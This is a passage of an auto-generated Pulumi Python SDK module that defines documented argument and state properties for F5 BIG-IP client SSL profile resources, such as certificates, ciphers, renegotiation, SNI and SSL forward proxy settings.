return pulumi.get(self, "c3d_client_fallback_cert")
@c3d_client_fallback_cert.setter
def c3d_client_fallback_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "c3d_client_fallback_cert", value)
@property
@pulumi.getter(name="c3dDropUnknownOcspStatus")
def c3d_drop_unknown_ocsp_status(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the BIG-IP action when the OCSP responder returns an unknown status. The default value is `drop`, which causes the connection to be dropped. Alternatively, you can specify `ignore`, which causes the connection to ignore the unknown status and continue.
"""
return pulumi.get(self, "c3d_drop_unknown_ocsp_status")
@c3d_drop_unknown_ocsp_status.setter
def c3d_drop_unknown_ocsp_status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "c3d_drop_unknown_ocsp_status", value)
@property
@pulumi.getter(name="c3dOcsp")
def c3d_ocsp(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
"""
return pulumi.get(self, "c3d_ocsp")
@c3d_ocsp.setter
def c3d_ocsp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "c3d_ocsp", value)
@property
@pulumi.getter(name="caFile")
def ca_file(self) -> Optional[pulumi.Input[str]]:
"""
Client certificate file path. Default None.
"""
return pulumi.get(self, "ca_file")
@ca_file.setter
def ca_file(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ca_file", value)
@property
@pulumi.getter(name="cacheSize")
def cache_size(self) -> Optional[pulumi.Input[int]]:
"""
Cache size (sessions).
"""
return pulumi.get(self, "cache_size")
@cache_size.setter
def cache_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cache_size", value)
@property
@pulumi.getter(name="cacheTimeout")
def cache_timeout(self) -> Optional[pulumi.Input[int]]:
"""
Cache time out
"""
return pulumi.get(self, "cache_timeout")
@cache_timeout.setter
def cache_timeout(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cache_timeout", value)
@property
@pulumi.getter
def cert(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a cert name for use.
"""
return pulumi.get(self, "cert")
@cert.setter
def cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cert", value)
@property
@pulumi.getter(name="certExtensionIncludes")
def cert_extension_includes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Cert extension includes for ssl forward proxy
"""
return pulumi.get(self, "cert_extension_includes")
@cert_extension_includes.setter
def cert_extension_includes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "cert_extension_includes", value)
@property
@pulumi.getter(name="certKeyChains")
def cert_key_chains(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ProfileClientSslCertKeyChainArgs']]]]:
return pulumi.get(self, "cert_key_chains")
@cert_key_chains.setter
def cert_key_chains(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ProfileClientSslCertKeyChainArgs']]]]):
pulumi.set(self, "cert_key_chains", value)
@property
@pulumi.getter(name="certLifeSpan")
def cert_life_span(self) -> Optional[pulumi.Input[int]]:
"""
Life span of the certificate in days for ssl forward proxy
"""
return pulumi.get(self, "cert_life_span")
@cert_life_span.setter
def cert_life_span(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cert_life_span", value)
@property
@pulumi.getter(name="certLookupByIpaddrPort")
def cert_lookup_by_ipaddr_port(self) -> Optional[pulumi.Input[str]]:
"""
Cert lookup by ip address and port enabled / disabled
"""
return pulumi.get(self, "cert_lookup_by_ipaddr_port")
@cert_lookup_by_ipaddr_port.setter
def cert_lookup_by_ipaddr_port(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cert_lookup_by_ipaddr_port", value)
@property
@pulumi.getter
def chain(self) -> Optional[pulumi.Input[str]]:
"""
Contains a certificate chain that is relevant to the certificate and key mentioned earlier. This key is optional.
"""
return pulumi.get(self, "chain")
@chain.setter
def chain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "chain", value)
@property
@pulumi.getter
def ciphers(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
"""
return pulumi.get(self, "ciphers")
@ciphers.setter
def ciphers(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ciphers", value)
@property
@pulumi.getter(name="clientCertCa")
def client_cert_ca(self) -> Optional[pulumi.Input[str]]:
"""
client certificate name
"""
return pulumi.get(self, "client_cert_ca")
@client_cert_ca.setter
def client_cert_ca(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "client_cert_ca", value)
@property
@pulumi.getter(name="crlFile")
def crl_file(self) -> Optional[pulumi.Input[str]]:
"""
Certificate revocation file name
"""
return pulumi.get(self, "crl_file")
@crl_file.setter
def crl_file(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "crl_file", value)
@property
@pulumi.getter(name="defaultsFrom")
def defaults_from(self) -> Optional[pulumi.Input[str]]:
"""
Parent profile for this clientssl profile. Once this value has been set, it cannot be changed. The default value is `/Common/clientssl`. It should be the full path `/partition/profile_name`.
"""
return pulumi.get(self, "defaults_from")
@defaults_from.setter
def defaults_from(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "defaults_from", value)
@property
@pulumi.getter(name="forwardProxyBypassDefaultAction")
def forward_proxy_bypass_default_action(self) -> Optional[pulumi.Input[str]]:
"""
Forward proxy bypass default action. (enabled / disabled)
"""
return pulumi.get(self, "forward_proxy_bypass_default_action")
@forward_proxy_bypass_default_action.setter
def forward_proxy_bypass_default_action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "forward_proxy_bypass_default_action", value)
@property
@pulumi.getter(name="fullPath")
def full_path(self) -> Optional[pulumi.Input[str]]:
"""
full path of the profile
"""
return pulumi.get(self, "full_path")
@full_path.setter
def full_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "full_path", value)
@property
@pulumi.getter
def generation(self) -> Optional[pulumi.Input[int]]:
"""
generation
"""
return pulumi.get(self, "generation")
@generation.setter
def generation(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "generation", value)
@property
@pulumi.getter(name="genericAlert")
def generic_alert(self) -> Optional[pulumi.Input[str]]:
"""
Generic alerts enabled / disabled.
"""
return pulumi.get(self, "generic_alert")
@generic_alert.setter
def generic_alert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "generic_alert", value)
@property
@pulumi.getter(name="handshakeTimeout")
def handshake_timeout(self) -> Optional[pulumi.Input[str]]:
"""
Handshake time out (seconds)
"""
return pulumi.get(self, "handshake_timeout")
@handshake_timeout.setter
def handshake_timeout(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "handshake_timeout", value)
@property
@pulumi.getter(name="inheritCertKeychain")
def inherit_cert_keychain(self) -> Optional[pulumi.Input[str]]:
"""
Inherit cert key chain
"""
return pulumi.get(self, "inherit_cert_keychain")
@inherit_cert_keychain.setter
def inherit_cert_keychain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "inherit_cert_keychain", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
Contains a key name
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="modSslMethods")
def mod_ssl_methods(self) -> Optional[pulumi.Input[str]]:
"""
ModSSL Methods enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "mod_ssl_methods")
@mod_ssl_methods.setter
def mod_ssl_methods(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mod_ssl_methods", value)
@property
@pulumi.getter
def mode(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables the SSL profile (`enabled` / `disabled`).
"""
return pulumi.get(self, "mode")
@mode.setter
def mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mode", value)
@property
@pulumi.getter
def partition(self) -> Optional[pulumi.Input[str]]:
"""
name of partition
"""
return pulumi.get(self, "partition")
@partition.setter
def partition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partition", value)
@property
@pulumi.getter
def passphrase(self) -> Optional[pulumi.Input[str]]:
"""
Client Certificate Constrained Delegation CA passphrase
"""
return pulumi.get(self, "passphrase")
@passphrase.setter
def passphrase(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "passphrase", value)
@property
@pulumi.getter(name="peerCertMode")
def peer_cert_mode(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the way the system handles client certificates. When `ignore`, the system ignores certificates from client systems. When `require`, the system requires a client to present a valid certificate. When `request`, the system requests a valid certificate from a client but always authenticates the client.
"""
return pulumi.get(self, "peer_cert_mode")
@peer_cert_mode.setter
def peer_cert_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "peer_cert_mode", value)
@property
@pulumi.getter(name="proxyCaCert")
def proxy_ca_cert(self) -> Optional[pulumi.Input[str]]:
"""
Proxy CA Cert
"""
return pulumi.get(self, "proxy_ca_cert")
@proxy_ca_cert.setter
def proxy_ca_cert(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ca_cert", value)
@property
@pulumi.getter(name="proxyCaKey")
def proxy_ca_key(self) -> Optional[pulumi.Input[str]]:
"""
Proxy CA Key
"""
return pulumi.get(self, "proxy_ca_key")
@proxy_ca_key.setter
def proxy_ca_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ca_key", value)
@property
@pulumi.getter(name="proxyCaPassphrase")
def proxy_ca_passphrase(self) -> Optional[pulumi.Input[str]]:
"""
Proxy CA Passphrase
"""
return pulumi.get(self, "proxy_ca_passphrase")
@proxy_ca_passphrase.setter
def proxy_ca_passphrase(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ca_passphrase", value)
@property
@pulumi.getter(name="proxySsl")
def proxy_ssl(self) -> Optional[pulumi.Input[str]]:
"""
Proxy SSL enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "proxy_ssl")
@proxy_ssl.setter
def proxy_ssl(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ssl", value)
@property
@pulumi.getter(name="proxySslPassthrough")
def proxy_ssl_passthrough(self) -> Optional[pulumi.Input[str]]:
"""
Proxy SSL passthrough enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "proxy_ssl_passthrough")
@proxy_ssl_passthrough.setter
def proxy_ssl_passthrough(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "proxy_ssl_passthrough", value)
@property
@pulumi.getter(name="renegotiatePeriod")
def renegotiate_period(self) -> Optional[pulumi.Input[str]]:
"""
Renegotiate Period (seconds)
"""
return pulumi.get(self, "renegotiate_period")
@renegotiate_period.setter
def renegotiate_period(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "renegotiate_period", value)
@property
@pulumi.getter(name="renegotiateSize")
def renegotiate_size(self) -> Optional[pulumi.Input[str]]:
"""
Renegotiate Size
"""
return pulumi.get(self, "renegotiate_size")
@renegotiate_size.setter
def renegotiate_size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "renegotiate_size", value)
@property
@pulumi.getter
def renegotiation(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables SSL renegotiation. When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "renegotiation")
@renegotiation.setter
def renegotiation(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "renegotiation", value)
@property
@pulumi.getter(name="retainCertificate")
def retain_certificate(self) -> Optional[pulumi.Input[str]]:
"""
When `true`, client certificate is retained in SSL session.
"""
return pulumi.get(self, "retain_certificate")
@retain_certificate.setter
def retain_certificate(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "retain_certificate", value)
@property
@pulumi.getter(name="secureRenegotiation")
def secure_renegotiation(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the method of secure renegotiation for SSL connections. When creating a new profile, the setting is provided by the parent profile.
When set to `request`, the system requests secure renegotiation of SSL connections.
`require` is the default setting; when set, the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
When set to `require-strict`, the system requires strict renegotiation of SSL connections; in this mode the system refuses connections to insecure servers and terminates existing SSL connections to insecure servers.
"""
return pulumi.get(self, "secure_renegotiation")
@secure_renegotiation.setter
def secure_renegotiation(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "secure_renegotiation", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile. The server name can also be a wildcard string containing the asterisk `*` character.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter(name="sessionMirroring")
def session_mirroring(self) -> Optional[pulumi.Input[str]]:
"""
Session Mirroring (enabled / disabled)
"""
return pulumi.get(self, "session_mirroring")
@session_mirroring.setter
def session_mirroring(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "session_mirroring", value)
@property
@pulumi.getter(name="sessionTicket")
def session_ticket(self) -> Optional[pulumi.Input[str]]:
"""
Session Ticket (enabled / disabled)
"""
return pulumi.get(self, "session_ticket")
@session_ticket.setter
def session_ticket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "session_ticket", value)
@property
@pulumi.getter(name="sniDefault")
def sni_default(self) -> Optional[pulumi.Input[str]]:
"""
Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support. When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
"""
return pulumi.get(self, "sni_default")
@sni_default.setter
def sni_default(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sni_default", value)
@property
@pulumi.getter(name="sniRequire")
def sni_require(self) -> Optional[pulumi.Input[str]]:
"""
Requires that the network peers also provide SNI support. This setting takes effect only when `sni_default` is set to `true`. When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "sni_require")
@sni_require.setter
def sni_require(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sni_require", value)
@property
@pulumi.getter(name="sslC3d")
def ssl_c3d(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables SSL client certificate constrained delegation. The default is `disabled`; specify `enabled` to use SSL client certificate constrained delegation.
"""
return pulumi.get(self, "ssl_c3d")
@ssl_c3d.setter
def ssl_c3d(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_c3d", value)
@property
@pulumi.getter(name="sslForwardProxy")
def ssl_forward_proxy(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
"""
return pulumi.get(self, "ssl_forward_proxy")
@ssl_forward_proxy.setter
def ssl_forward_proxy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_forward_proxy", value)
@property
@pulumi.getter(name="sslForwardProxyBypass")
def ssl_forward_proxy_bypass(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
"""
return pulumi.get(self, "ssl_forward_proxy_bypass")
@ssl_forward_proxy_bypass.setter
def ssl_forward_proxy_bypass(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_forward_proxy_bypass", value)
@property
@pulumi.getter(name="sslSignHash")
def ssl_sign_hash(self) -> Optional[pulumi.Input[str]]:
"""
SSL sign hash (any, sha1, sha256, sha384)
"""
return pulumi.get(self, "ssl_sign_hash")
@ssl_sign_hash.setter
def ssl_sign_hash(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ssl_sign_hash", value)
@property
@pulumi.getter(name="strictResume")
def strict_resume(self) -> Optional[pulumi.Input[str]]:
"""
Enables or disables the resumption of SSL sessions after an unclean shutdown. When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "strict_resume")
@strict_resume.setter
def strict_resume(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "strict_resume", value)
@property
@pulumi.getter(name="tmOptions")
def tm_options(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of enabled selections from a set of industry-standard options for handling SSL processing. By default,
`Don't insert empty fragments` and `No TLSv1.3` are the enabled options. Usage: `tm_options = ["dont-insert-empty-fragments","no-tlsv1.3"]`
"""
return pulumi.get(self, "tm_options")
@tm_options.setter
def tm_options(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tm_options", value)
@property
@pulumi.getter(name="uncleanShutdown")
def unclean_shutdown(self) -> Optional[pulumi.Input[str]]:
"""
Unclean Shutdown (enabled / disabled)
"""
return pulumi.get(self, "unclean_shutdown")
@unclean_shutdown.setter
def unclean_shutdown(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "unclean_shutdown", value)
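# A minimal usage sketch for the resource these argument classes back
# (assumption: the package is published as `pulumi_f5bigip` with this
# resource under its `ltm` module). Kept entirely in comments so nothing
# executes when this generated module is imported:
#
#   import pulumi_f5bigip as f5bigip
#
#   clientssl = f5bigip.ltm.ProfileClientSsl("sample",
#       name="/Common/test-clientssl-profile",
#       defaults_from="/Common/clientssl",
#       sni_default="true")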
@pulumi.input_type
class _ProfileClientSslState:
def __init__(__self__, *,
alert_timeout: Optional[pulumi.Input[str]] = None,
allow_non_ssl: Optional[pulumi.Input[str]] = None,
authenticate: Optional[pulumi.Input[str]] = None,
authenticate_depth: Optional[pulumi.Input[int]] = None,
c3d_client_fallback_cert: Optional[pulumi.Input[str]] = None,
c3d_drop_unknown_ocsp_status: Optional[pulumi.Input[str]] = None,
c3d_ocsp: Optional[pulumi.Input[str]] = None,
ca_file: Optional[pulumi.Input[str]] = None,
cache_size: Optional[pulumi.Input[int]] = None,
cache_timeout: Optional[pulumi.Input[int]] = None,
cert: Optional[pulumi.Input[str]] = None,
cert_extension_includes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cert_key_chains: Optional[pulumi.Input[Sequence[pulumi.Input['ProfileClientSslCertKeyChainArgs']]]] = None,
cert_life_span: Optional[pulumi.Input[int]] = None,
cert_lookup_by_ipaddr_port: Optional[pulumi.Input[str]] = None,
chain: Optional[pulumi.Input[str]] = None,
ciphers: Optional[pulumi.Input[str]] = None,
client_cert_ca: Optional[pulumi.Input[str]] = None,
crl_file: Optional[pulumi.Input[str]] = None,
defaults_from: Optional[pulumi.Input[str]] = None,
forward_proxy_bypass_default_action: Optional[pulumi.Input[str]] = None,
full_path: Optional[pulumi.Input[str]] = None,
generation: Optional[pulumi.Input[int]] = None,
generic_alert: Optional[pulumi.Input[str]] = None,
handshake_timeout: Optional[pulumi.Input[str]] = None,
inherit_cert_keychain: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
mod_ssl_methods: Optional[pulumi.Input[str]] = None,
mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
partition: Optional[pulumi.Input[str]] = None,
passphrase: Optional[pulumi.Input[str]] = None,
peer_cert_mode: Optional[pulumi.Input[str]] = None,
proxy_ca_cert: Optional[pulumi.Input[str]] = None,
proxy_ca_key: Optional[pulumi.Input[str]] = None,
proxy_ca_passphrase: Optional[pulumi.Input[str]] = None,
proxy_ssl: Optional[pulumi.Input[str]] = None,
proxy_ssl_passthrough: Optional[pulumi.Input[str]] = None,
renegotiate_period: Optional[pulumi.Input[str]] = None,
renegotiate_size: Optional[pulumi.Input[str]] = None,
renegotiation: Optional[pulumi.Input[str]] = None,
retain_certificate: Optional[pulumi.Input[str]] = None,
secure_renegotiation: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
session_mirroring: Optional[pulumi.Input[str]] = None,
session_ticket: Optional[pulumi.Input[str]] = None,
sni_default: Optional[pulumi.Input[str]] = None,
sni_require: Optional[pulumi.Input[str]] = None,
ssl_c3d: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy_bypass: Optional[pulumi.Input[str]] = None,
ssl_sign_hash: Optional[pulumi.Input[str]] = None,
strict_resume: Optional[pulumi.Input[str]] = None,
tm_options: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
unclean_shutdown: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ProfileClientSsl resources.
:param pulumi.Input[str] alert_timeout: Alert time out
:param pulumi.Input[str] allow_non_ssl: Enables or disables acceptance of non-SSL connections. When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[str] authenticate: Specifies the frequency of client authentication for an SSL session. When `once`, the system authenticates the client once per SSL session.
When `always`, the system authenticates the client once per SSL session and also upon reuse of that session.
:param pulumi.Input[int] authenticate_depth: Specifies the maximum number of certificates to be traversed in a client certificate chain
:param pulumi.Input[str] c3d_client_fallback_cert: Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate is used if the client does not provide a certificate during the SSL handshake. The default value is `none`.
:param pulumi.Input[str] c3d_drop_unknown_ocsp_status: Specifies the BIG-IP action when the OCSP responder returns an unknown status. The default value is `drop`, which causes the connection to be dropped. Alternatively, you can specify `ignore`, which causes the connection to ignore the unknown status and continue.
:param pulumi.Input[str] c3d_ocsp: Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
:param pulumi.Input[str] ca_file: Client certificate file path. Default None.
:param pulumi.Input[int] cache_size: Cache size (sessions).
:param pulumi.Input[int] cache_timeout: Cache time out
:param pulumi.Input[str] cert: Specifies a cert name for use.
:param pulumi.Input[Sequence[pulumi.Input[str]]] cert_extension_includes: Cert extension includes for ssl forward proxy
:param pulumi.Input[int] cert_life_span: Life span of the certificate in days for ssl forward proxy
:param pulumi.Input[str] cert_lookup_by_ipaddr_port: Cert lookup by ip address and port enabled / disabled
:param pulumi.Input[str] chain: Contains a certificate chain that is relevant to the certificate and key mentioned earlier. This key is optional.
:param pulumi.Input[str] ciphers: Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
:param pulumi.Input[str] client_cert_ca: client certificate name
:param pulumi.Input[str] crl_file: Certificate revocation file name
:param pulumi.Input[str] defaults_from: Parent profile for this clientssl profile. Once this value has been set, it cannot be changed. The default value is `/Common/clientssl`. It should be the full path `/partition/profile_name`.
:param pulumi.Input[str] forward_proxy_bypass_default_action: Forward proxy bypass default action. (enabled / disabled)
:param pulumi.Input[str] full_path: full path of the profile
:param pulumi.Input[int] generation: generation
:param pulumi.Input[str] generic_alert: Generic alerts enabled / disabled.
:param pulumi.Input[str] handshake_timeout: Handshake time out (seconds)
:param pulumi.Input[str] inherit_cert_keychain: Inherit cert key chain
:param pulumi.Input[str] key: Contains a key name
:param pulumi.Input[str] mod_ssl_methods: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] mode: Enables or disables the SSL profile (`enabled` / `disabled`).
:param pulumi.Input[str] name: Specifies the name of the profile. The name should be the full path, which is the combination of the `partition + profile name`, for example `/Common/test-clientssl-profile`.
:param pulumi.Input[str] partition: name of partition
:param pulumi.Input[str] passphrase: Client Certificate Constrained Delegation CA passphrase
:param pulumi.Input[str] peer_cert_mode: Specifies the way the system handles client certificates. When `ignore`, the system ignores certificates from client systems. When `require`, the system requires a client to present a valid certificate. When `request`, the system requests a valid certificate from a client but always authenticates the client.
:param pulumi.Input[str] proxy_ca_cert: Proxy CA Cert
:param pulumi.Input[str] proxy_ca_key: Proxy CA Key
:param pulumi.Input[str] proxy_ca_passphrase: Proxy CA Passphrase
:param pulumi.Input[str] proxy_ssl: Proxy SSL enabled / disabled. Default is disabled.
:param pulumi.Input[str] proxy_ssl_passthrough: Proxy SSL passthrough enabled / disabled. Default is disabled.
:param pulumi.Input[str] renegotiate_period: Renegotiate Period (seconds)
:param pulumi.Input[str] renegotiate_size: Renegotiate Size
:param pulumi.Input[str] renegotiation: Enables or disables SSL renegotiation. When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[str] retain_certificate: When `true`, client certificate is retained in SSL session.
:param pulumi.Input[str] secure_renegotiation: Specifies the method of secure renegotiation for SSL connections. When creating a new profile, the setting is provided by the parent profile.
When set to `request`, the system requests secure renegotiation of SSL connections.
`require` is the default setting; when set, the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
When set to `require-strict`, the system requires strict renegotiation of SSL connections; in this mode the system refuses connections to insecure servers and terminates existing SSL connections to insecure servers.
:param pulumi.Input[str] server_name: Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile. The server name can also be a wildcard string containing the asterisk `*` character.
:param pulumi.Input[str] session_mirroring: Session Mirroring (enabled / disabled)
:param pulumi.Input[str] session_ticket: Session Ticket (enabled / disabled)
:param pulumi.Input[str] sni_default: Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support. When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
:param pulumi.Input[str] sni_require: Requires that the network peers also provide SNI support. This setting only takes effect when `sni_default` is set to `true`. When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[str] ssl_c3d: Enables or disables SSL client certificate constrained delegation. The default option is disabled; specify enabled to use SSL client certificate constrained delegation.
:param pulumi.Input[str] ssl_forward_proxy: Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_forward_proxy_bypass: Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_sign_hash: SSL sign hash (any, sha1, sha256, sha384)
:param pulumi.Input[str] strict_resume: Enables or disables the resumption of SSL sessions after an unclean shutdown. When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tm_options: List of enabled options, selected from a set of industry-standard options for handling SSL processing. By default,
`Don't insert empty fragments` and `No TLSv1.3` are listed as enabled options. Usage: `tm_options = ["dont-insert-empty-fragments", "no-tlsv1.3"]`
:param pulumi.Input[str] unclean_shutdown: Unclean Shutdown (enabled / disabled)
"""
if alert_timeout is not None:
pulumi.set(__self__, "alert_timeout", alert_timeout)
if allow_non_ssl is not None:
pulumi.set(__self__, "allow_non_ssl", allow_non_ssl)
if authenticate is not None:
pulumi.set(__self__, "authenticate", authenticate)
if authenticate_depth is not None:
pulumi.set(__self__, "authenticate_depth", authenticate_depth)
if c3d_client_fallback_cert is not None:
pulumi.set(__self__, "c3d_client_fallback_cert", c3d_client_fallback_cert)
if c3d_drop_unknown_ocsp_status is not None:
pulumi.set(__self__, "c3d_drop_unknown_ocsp_status", c3d_drop_unknown_ocsp_status)
if c3d_ocsp is not None:
pulumi.set(__self__, "c3d_ocsp", c3d_ocsp)
if ca_file is not None:
pulumi.set(__self__, "ca_file", ca_file)
if cache_size is not None:
pulumi.set(__self__, "cache_size", cache_size)
if cache_timeout is not None:
pulumi.set(__self__, "cache_timeout", cache_timeout)
if cert is not None:
pulumi.set(__self__, "cert", cert)
if cert_extension_includes is not None:
pulumi.set(__self__, "cert_extension_includes", cert_extension_includes)
if cert_key_chains is not None:
pulumi.set(__self__, "cert_key_chains", cert_key_chains)
if cert_life_span is not None:
pulumi.set(__self__, "cert_life_span", cert_life_span)
if cert_lookup_by_ipaddr_port is not None:
pulumi.set(__self__, "cert_lookup_by_ipaddr_port", cert_lookup_by_ipaddr_port)
if chain is not None:
pulumi.set(__self__, "chain", chain)
if ciphers is not None:
pulumi.set(__self__, "ciphers", ciphers)
if client_cert_ca is not None:
pulumi.set(__self__, "client_cert_ca", client_cert_ca)
if crl_file is not None:
pulumi.set(__self__, "crl_file", crl_file)
if defaults_from is not None:
pulumi.set(__self__, "defaults_from", defaults_from)
if forward_proxy_bypass_default_action is not None:
pulumi.set(__self__, "forward_proxy_bypass_default_action", forward_proxy_bypass_default_action)
if full_path is not None:
pulumi.set(__self__, "full_path", full_path)
if generation is not None:
pulumi.set(__self__, "generation", generation)
if generic_alert is not None:
pulumi.set(__self__, "generic_alert", generic_alert)
if handshake_timeout is not None:
pulumi.set(__self__, "handshake_timeout", handshake_timeout)
if inherit_cert_keychain is not None:
pulumi.set(__self__, "inherit_cert_keychain", inherit_cert_keychain)
if key is not None:
pulumi.set(__self__, "key", key)
if mod_ssl_methods is not None:
pulumi.set(__self__, "mod_ssl_methods", mod_ssl_methods)
if mode is not None:
pulumi.set(__self__, "mode", mode)
if name is not None:
pulumi.set(__self__, "name", name)
if partition is not None:
pulumi.set(__self__, "partition", partition)
if passphrase is not None:
pulumi.set(__self__, "passphrase", passphrase)
if peer_cert_mode is not None:
pulumi.set(__self__, "peer_cert_mode", peer_cert_mode)
if proxy_ca_cert is not None:
pulumi.set(__self__, "proxy_ca_cert", proxy_ca_cert)
if proxy_ca_key is not None:
pulumi.set(__self__, "proxy_ca_key", proxy_ca_key)
if proxy_ca_passphrase is not None:
pulumi.set(__self__, "proxy_ca_passphrase", proxy_ca_passphrase)
if proxy_ssl is not None:
pulumi.set(__self__, "proxy_ssl", proxy_ssl)
if proxy_ssl_passthrough is not None:
pulumi.set(__self__, "proxy_ssl_passthrough", proxy_ssl_passthrough)
if renegotiate_period is not None:
pulumi.set(__self__, "renegotiate_period", renegotiate_period)
if renegotiate_size is not None:
pulumi.set(__self__, "renegotiate_size", renegotiate_size)
if renegotiation is not None:
pulumi.set(__self__, "renegotiation", renegotiation)
if retain_certificate is not None:
pulumi.set(__self__, "retain_certificate", retain_certificate)
if secure_renegotiation is not None:
pulumi.set(__self__, "secure_renegotiation", secure_renegotiation)
if server_name is not None:
pulumi.set(__self__, "server_name", server_name)
if session_mirroring is not None:
